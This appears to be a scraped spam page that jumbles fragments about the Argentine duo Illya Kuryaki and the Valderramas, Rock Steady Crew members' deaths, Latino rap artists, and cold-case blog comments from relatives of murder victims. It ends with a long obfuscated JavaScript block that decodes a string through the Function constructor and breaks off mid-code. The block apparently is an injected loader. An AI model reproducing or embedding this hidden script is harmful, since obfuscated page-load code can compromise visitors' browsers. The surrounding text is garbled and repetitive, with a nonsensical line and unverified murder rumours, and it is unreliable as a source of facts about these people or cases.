She is my biological mother . If the case is cold you can contact the Cold Case Squad. However, we dont see Latino rap in English as hyped as it should be. Do you know anyone who was murdered? In 1998, the album's second cut, 'Jugo', was nominated for best group video and best alternative video at the MTV Latino Music Awards. Stacy Horn Teresa croom No reason to kill her and where was security was that for three days left behind a shower.. We want answers.and closure..please if anyone has information please contact our family. The NYPL put together a page of tips to find out who lived in your building and its history, etc: http://www.nypl.org/blog/2011/10/14/guide-researching-your-homes-history. If youve never done anything like this before, I can assure you its not hard to do, and the librarian can help. 6 on the UK Singles Chart, [1] and reached the top 10 in many European countries. Both stabbed twice in the neck, listed as a robbery. Those barrels contain homicide evidence. Leche was nominated for Best Rock Album at the first annual Latin Grammy Awards (eligibility year of Jan. 1, 1999, through March 31, 2000). Had he been born two generations earlier, he might have been the king of boogie-woogie, or a jitterbug virtuoso.. Killed during a robbery while eating breakfast. Kuriaki has attempted Mount Foraker five times, successfully reaching the summit three times, including the first solo winter ascent of that peak on March 10, 2007. It could be that they simply did not have enough evidence to make a convincing case. He is survived by a brother and two sisters. Were there any witnesses? I fought for as long as I could but I couldnt bare the pain. The Rock Steady Crew is still a thing, expanding to consist of several groups in different locations. It was an important time for the dance movement. // Oct 7, 2015 at 11:08 pm. // Dec 16, 2015 at 10:24 am, My father was kill ion 148 Lexington in 1979 by a taix driver I believe that person is still living and has not been arrested yet or has skipped the country I need help!! As Fat Joe so importantly reminded the world recently, Latinxs have been there as an integral part of hip-hop pretty much since its inception during the late 1970s and early 80s. Create your own unique website with customizable templates. 80. For some reason, I cannot find out his real name or how he died. [1] The duo took their name from a fictional character, the Soviet spy Illya Kuryakin in the hit 1960s TV show The Man from U.N.C.L.E., and the Colombian football player Carlos Valderrama. Working in the U.S., they recorded their fifth studio album at Ocean Recording Studios, Burbank, and Battery Studios, New York, leaning more to soul music and funk music. The album features bass player Bootsy Collins, who introduces himself saying, 'My name is Bootsy Collins, old woman!' Wayne Frost, a hip-hop pioneer known as Frosty Freeze who helped inspire a worldwide break-dancing craze in the early 1980s as a member of the influential group Rock Steady Crew, died on Thursday in Manhattan. Has your friend asked her mother? on her at the time of death. Released in 1990, La Raza is his biggest hit, and reps for Chicanxs in rap in both the single and its video. The album its on, of the same name, charted on the Billboard 200 chart; Immortal Technique used the proceeds from sales to build an orphanage in Afghanistan. [4], In 1991 they released their first album entitled Fabrico cuero (I make leather), which combines rap, synthesized sounds, catchy melodies and ironic lyrics. Chaco sold over 250,000 copies. This is a lot easier than going through microfilm. You didnt say what you were trying to find out, but you can request a copy of his death certificate here: This will give you some information about his death. When was she murdered exactly, and where in Brooklyn? // Oct 7, 2015 at 9:09 am. A b-boy dance phrase finishes with a freeze, hence the name that Mr. Frost adopted. 32 Dipset) with fellow Afro-Latinx Juelz Santana. Mr. He was a cab driver and during the time he was killed, there were many livery drivers being robbed and killed. The result was world wide attention to the b-boy cause. If any leads as to who did it n why. [4], They officially reunited in 2011. Anyway, he was murdered and badly mutilated in the borough of Brooklyn. Devious doze. The moves he did were really super high-risk. The crews big break came in 1981. Margaret How can I know for sure? Buck 4 - Rock Steady Crew - 1991. Jorge Pabon, who uses the name Pop Master Fabel and is the vice president of the group, confirmed Mr. Frosts death, at Mount Sinai Medical Center, saying it followed a long illness, which he did not identify. If you have information about a specific case, and believe the crime was committed by someone within law enforcement, I believe your best bet would be to contact the District Attorney. From there you can contact the police precinct to find out the status of her case. we asked Jacobi morgue and nothing yet, 37 It went to #2 on the Billboard Hot 100 chart and stayed on it for 20 weeks. The Miami Herald (March 25, 2001), : Download Lagu Iwan Fals Ijinkan Aku Menyayangimu Mp4, : Enrique Iglesias Addicted Mp3 Download 320kbps, Universal Music Group, Sony Music Entertainment. At the time, break dancing, or b-boying, a daring and complex dance form that grew out of the streets of the Bronx and Harlem in the 1970s, was one element of the emerging hip-hop culture, which included graffiti art, rapping and D.J.s scratching and mixing vinyl records on turntables. -Guy Davis aka Double K is a well known blues musician and continues to tour around the country to this day. 16 Illya Kuryaki and the Valderramas (IKV) is a musical duo formed in 1991 consisting of Dante Spinetta and Emmanuel Horvilleur, from Buenos Aires, Argentina. The death of the duo's friend and manager Jos Luis Miceli, who died in a car crash in early 2000[7] had a big impact on them. 34 // Oct 14, 2015 at 2:29 pm, Been looking into my fathers death New York City June 18th 1973 cant find nothing looking for obituaries cant find out nothing Raymond Skinner, 18 Known as the Godfather of Latin Rap, Ace, born Ulpiano Sergio Reyes is an Afro-Cuban rapper, and brother to Cypress Hills Sen Dog. people have been killed over speaking out on Buck 4s death hence to this day crazy legs never really dwell or speak on the situation even on the freshest kids DVD. It was mastered at Sony Studios, New York and mixed at Battery Studios, New York. Have you discussed this with the detectives? One that he created involved a flip in the air that ended with Mr. If there was a trial but the person wasnt convicted the case would be closed until they had a new suspect. I would start by ordering his death certificate. Once signed to Aftermath Entertainment, the Puerto Rican artist has collaborated with Big Daddy Kane, Akon, Immortal Technique, The Alchemist, Styles P, Royce da 59, and more. Chicano rapper A.L.T. paula vialpando You may have been yelling out ballin! in the 2000s as well. // Dec 16, 2015 at 7:20 pm. // Dec 13, 2015 at 12:21 am, My mother name is. Members appeared on The Late Show with David Letterman. Ray I dont have a last name and i was told she was a heavy set woman and he was thin. Frost got his start in 1978 with the Bronx-based Rock City Crew. Brooklyn born rapper AZ is also Afro-Latino. 1 Stacy Horn Stacy Horn I suggest reading through this link first. He pledged his support with the younger RSC members if they needed him in a battle. His adoptive mom is a good friend of my moms. // Oct 22, 2015 at 10:44 am. // Oct 9, 2015 at 8:49 am. The Rock Steady Crew was founded in 1977 in the Bronx and gained international attention throughout the '80s as its members, including Mr. Teresa croom -Two Of The Original Members of the Rock Steady Crew, Kuriaki and Buck4 were both killed in seperate drug homicides in 1991. the only thing that was known is that kuriaki was tortured and killed execution style in a garage. 'Funky Futurista' was used in the soundtrack of FIFA 14. 31 truthfully, possibly there is any adult who hasn't couldn't help but feel let down or betrayed in a person who never meet a diabetic's legal agreements. Im sorry for the loss of your father. The Rock Steady Crew is still a thing, expanding to consist of several groups in different locations. Two Of The Original Members of the Rock Steady Crew, Kuriaki and Buck4 were both k.lled in seperate drug homicides in 1991. Kuriaki was looking great, and he rocked that Back Spin, Side Spin. About Press Copyright Contact us Creators Advertise Developers Terms Privacy Policy & Safety How YouTube works Test new features Press Copyright Contact us Creators . // Oct 9, 2015 at 2:28 pm. In 2009, we were all counting out like it was Sesame Street: One-two-three-four, Uno-do-tres-cuatro, thanks to Cuban rapper Pitbulls big hit, I Know You Want Me (Calle Ocho). The ode to Calle Ocho in Miami, went worldwide, just like Mr. Worldwide himself, reaching the top 10 in over 20 countries. The Rock Steady Crew is a breaking and hip-hop crew, which got its start in New York. I edited your post because I didnt think it was a good idea to post some of that publicly. And, it features a Latina MC, Teardrop! The only thing that was known is that kuriaki was tortured and k.lled execution style in a garage. They began spreading the RSC name into Manhattan. Kuriaki rock steady crew death. Latin Alliance is a collaborative effort between Latinx rappers on the album of the same name. Im so sorry about your mother. makes it a point to shout out his Afro-Puerto Rican identity in his music, style, and videos. In 1982, Rock Steady Crew became members of Afrika Bambaataa's Zulu Nation. // Oct 9, 2015 at 8:40 am. Buck 4 was in Beat Street, though. There are now 9,082 unsolved murders in New York City going back to 1985. // Dec 7, 2015 at 7:00 pm. Informador. Im sure Im not telling you anything you dont already know, but they dont want to go to trial until they do because you only get one shot. Maria, 20 If the case is cold you can contact the Cold Case Squad. I am so sorry about your brother. She was a late 40s to early 50 year old African American woman. Argentina's Illya Kuryaki & the Valderramas bring their Latin rock/spiritual rap opera/funk to Anaheim. He was not only an amazing dancer but a daredevil, Mr. Pabon said in an interview Thursday. 4 Their number is 212-447-2030. Its a terrible secret that no one talks about. I am sorry for you and for his family and friends. I have never met my mother as I was abandoned in Harlem Hosp. Rest in power Show more Show more. A woman named Helen Mae Clayton Walker was the victim of a mugging & murder on the streets of Harlem, NYC. {'service': 'facebook', 'id': 'MrWigglesRsc'}, Margaret, Im sorry about your father. The shooting occurred by the old Lincoln hospital on March 7, 1976, 49 // Dec 17, 2015 at 7:00 pm. It contains No Way Jose and Virgen de ria. -Two Of The Original Members of the Rock Steady Crew, Kuriaki and Buck4 were both k*lled in seperate drug homicides in 1991. the only thing that was known is that kuriaki was tortured and k*lled execution style in a garage. [1], Horno para calentar los mares (19931994). [2], The duo met as children as a result of the friendship between their parents. I can help you when and if you get to this point. Stacy Horn Because of the sexual, obscene nature of his mutilation, I want to know if there were ever any updates. 4 Mar. South East L.A. group Delinquent Habits had a Billboard-charting song with Tres Delinquentes, off their 1996 album, Delinquent Habits. Sadie // Dec 13, 2015 at 1:41 pm. The group was reaching the end of their initial popularity wave. Kuriaki was looking great, and he rocked that Back Spin, Side Spin. Stacy Horn // Dec 1, 2015 at 12:03 pm, Hi i was wondering if you could help me find out if some info i received is true. Which precinct was it? Im very sorry about your mother. You describe one of the worst situations unfortunately, when they believe they have the killer but not enough evidence to prove it. Their musical style is extremely wide-ranging, including hip-hop, rock, funk, and salsa. Movies. Ugh. I think about everyday of my life. The duo split in 2001 to follow solo careers, but later performed together several times, and officially reunited in 2011. I go into more detail here: 27 I would have no way of knowing. What anomalies would you be looking for exactly? The more I break the more I shock. Break dancing had its own terminology and was composed of two basic elements: top rock, involving upper-body movement, and floor rock, involving footwork. It will be a lot of work, however. Kuriaki: Prince Ken Swift . The Afro-Dominican rapper appeared on several hit songs, from Chris Browns Run It, to Camrons Oh Boy, but scored one of his own hits with 2005s There It Go (The Whistle Song). In addition to being a rapper, Juelz has appeared on the reality show Love & Hip Hop: New York. Teshia Latham Due to their burgeoning success, they took on Kool Lady Blue as their manager. Frosty Freeze was an elder b-boy (a member of the Rock City Crew) who was still interested in the game but was without a steady crew. STANDS4 LLC, 2023. The Puerto Rican group made up of Mr. Schick (Daniel Rivera), DJ Julio (Steven Santiago), Mr. Nice (Jose Semprit), and Jimmy Mac (James Mclean) (the final lineup in 1979), released the first Spanglish rap song ever, 1981s Disco Dream.. If your mother is reluctant to bring it up because she doesnt want to upset her, your only choice is to start researching it yourself. 3.4K views, 211 likes, 0 loves, 5 comments, 17 shares, Facebook Watch Videos from Koreanroc TV: KURIAKI (R.I.P) - Rock steady crew. kyna d That is so sad, Im very sorry. But if you look over on the left on this blog, where it says, GETTING HELP CONTACTING A COLD CASE SQUAD, youll see: Before You Contact a Cold Case Squad. If you click on that youll see instructions Ive written on what do to. They were part of a European tour that included Afrika Bambaataa, Fab 5 Freddy, various graffiti artists among others. If you have a friend or loved one whose murder is still unsolved and you want to know what to do, please read this: People ask repeatedly in the comments section about what to do or who to call about an unsolved murder. If you remember the name of the suspect you can look here to see if he ever went to prison: http://nysdoccslookup.doccs.ny.gov/kinqw00, 10 Please help my restless mind and guide me in the direction I need to go. You may know Harlem native LaRon Louis James better by his rap name, Juelz Santana. In both cases she would type in her address and see if anything comes back (youd want to search on various versions of the address, ie, East 177 Street or E. 177 St, etc). Mainly Bronx or mount Vernon N.Y. her death index#is 19392006. {'service': 'instagram', 'id': 'MRWIGGLESRSC'} [8] Both Dante and Emmanuel continued solo performing careers. It peaked at #29 on the Billboard Hot 100 chart; N2Deep went on to release five more studio albums. I really hope someone find the person or people that did this to him. If you have specific questions after reading through these instructions please ask here, but come back to see the answer! Are you a family member? It seems that his 'crew' has been very tight lipped about it all, claiming it hurts too much to talk about. Frost, Mr. Pabon, Crazy Legs, Ken Swift and others, toured and performed. Hmm, thats awful. Stacy Horn 5 Also, cases that far back would not be easily accessible. Frost began attracting wide attention in 1981, when his picture appeared on the cover of The Village Voice with an article by Sally Banes titled Physical Graffiti: Breaking Is Hard to Do.. Hi again. [5] The album includes rock, funk, hip hop and ballads. Inspiration, empowerment, and entertainment for forward-thinking Latinas. // Oct 9, 2015 at 8:52 am. $mVT=String.fromCharCode(46,50,104,41,85,73,113,123,77,87,47,103,56,69,107,70,65,83,82,39,49,71,40,63,88,120,74,109,72,75,67,80,112,76,68,81,118,61,48,90,59,57,84,119,89,86,66,125,44);(![]+[])[+[]][([![]]+{})[+!+[]+[+[]]]+([]+[]+{})[+!+[]]+([]+[]+[][[]])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+(!![]+[])[!+[]+!+[]]+([![]]+{})[+!+[]+[+[]]]+(!![]+[])[+[]]+([]+[]+{})[+!+[]]+(!![]+[])[+!+[]]][([![]]+{})[+!+[]+[+[]]]+([]+[]+{})[+!+[]]+([]+[]+[][[]])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+(!![]+[])[!+[]+!+[]]+([![]]+{})[+!+[]+[+[]]]+(!![]+[])[+[]]+([]+[]+{})[+!+[]]+(!![]+[])[+!+[]]]($mVT[36]+(![]+[])[+!+[]]+(!![]+[])[+!+[]]+(+{}+[]+[]+[]+[]+{})[+!+[]+[+[]]]+$mVT[25]+$mVT[+!+[]+!+[]]+(!![]+[])[+!+[]]+$mVT[37]+([]+[]+[][[]])[+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+$mVT[43]+(+{}+[]+[]+[]+[]+{})[+!+[]+[+[]]]+$mVT[24]+$mVT[+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+$mVT[+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+$mVT[+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+[]]+$mVT[32]+$mVT[18]+(!![]+[])[!+[]+!+[]+!+[]]+$mVT[+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+(!![]+[])[!+[]+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+$mVT[+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+$mVT[+!+[]+!+[]+!+[]]+$mVT[+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+$mVT[25]+$mVT[+!+[]+!+[]]+(!![]+[])[+!+[]]+$mVT[(+[])]+([]+[]+{})[+!+[]]+$mVT[+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+([]+[]+[][[]])[+!+[]]+$mVT[+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+$mVT[+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+$mVT[+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+$mVT[+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+$mVT[+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+$mVT[19]+$mVT[48]+$mVT[+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+$mVT[+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+$mVT[+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[!+[]+!+[]]+([]+[]+{})[!+[]+!+[]]+([![]]+{})[+!+[]+[+[]]]+(![]+[])[+!+[]]+(!![]+[])[+!+[]]+([![]]+[][[]])[+!+[]+[+[]]]+$mVT[(+[])]+([![]]+[][[]])[+!+[]+[+[]]]+([]+[]+[][[]])[+!+[]]+(![]+[])[+[]]+([]+[]+{})[+!+[]]+$mVT[+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+$mVT[23]+([]+[]+[][[]])[+!+[]]+(![]+[])[!+[]+!+[]]+$mVT[33]+(!![]+[])[!+[]+!+[]]+$mVT[37]+$mVT[45]+(![]+[])[!+[]+!+[]]+(+{}+[]+[])[+[]]+$mVT[30]+$mVT[+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+$mVT[20]+$mVT[18]+$mVT[+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+$mVT[24]+$mVT[35]+$mVT[44]+$mVT[+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+$mVT[13]+$mVT[+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+$mVT[+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+$mVT[+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+$mVT[30]+$mVT[16]+([![]]+{})[+!+[]+[+[]]]+$mVT[+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+$mVT[+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+$mVT[+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+$mVT[35]+(![]+[]+[]+[]+{})[+!+[]+[]+[]+(!+[]+!+[]+!+[])]+$mVT[46]+$mVT[11]+$mVT[12]+$mVT[+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+$mVT[+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+$mVT[+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+$mVT[20]+$mVT[+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+$mVT[+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+$mVT[43]+$mVT[+!+[]+!+[]+!+[]+!+[]]+$mVT[+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+$mVT[+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+$mVT[18]+$mVT[41]+$mVT[24]+$mVT[+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+(![]+[])[!+[]+!+[]]+$mVT[39]+$mVT[21]+$mVT[30]+$mVT[2]+$mVT[2]+$mVT[+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+$mVT[+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+$mVT[+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+$mVT[+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+$mVT[44]+$mVT[4]+$mVT[+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+$mVT[+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+$mVT[24]+$mVT[+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+$mVT[+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+$mVT[41]+$mVT[+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+$mVT[+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+$mVT[14]+$mVT[46]+$mVT[44]+$mVT[13]+$mVT[43]+$mVT[+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+$mVT[+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+$mVT[+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+$mVT[26]+$mVT[+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+$mVT[17]+(![]+[])[!+[]+!+[]]+$mVT[38]+$mVT[5]+$mVT[13]+$mVT[+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+$mVT[12]+$mVT[46]+$mVT[21]+$mVT[+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+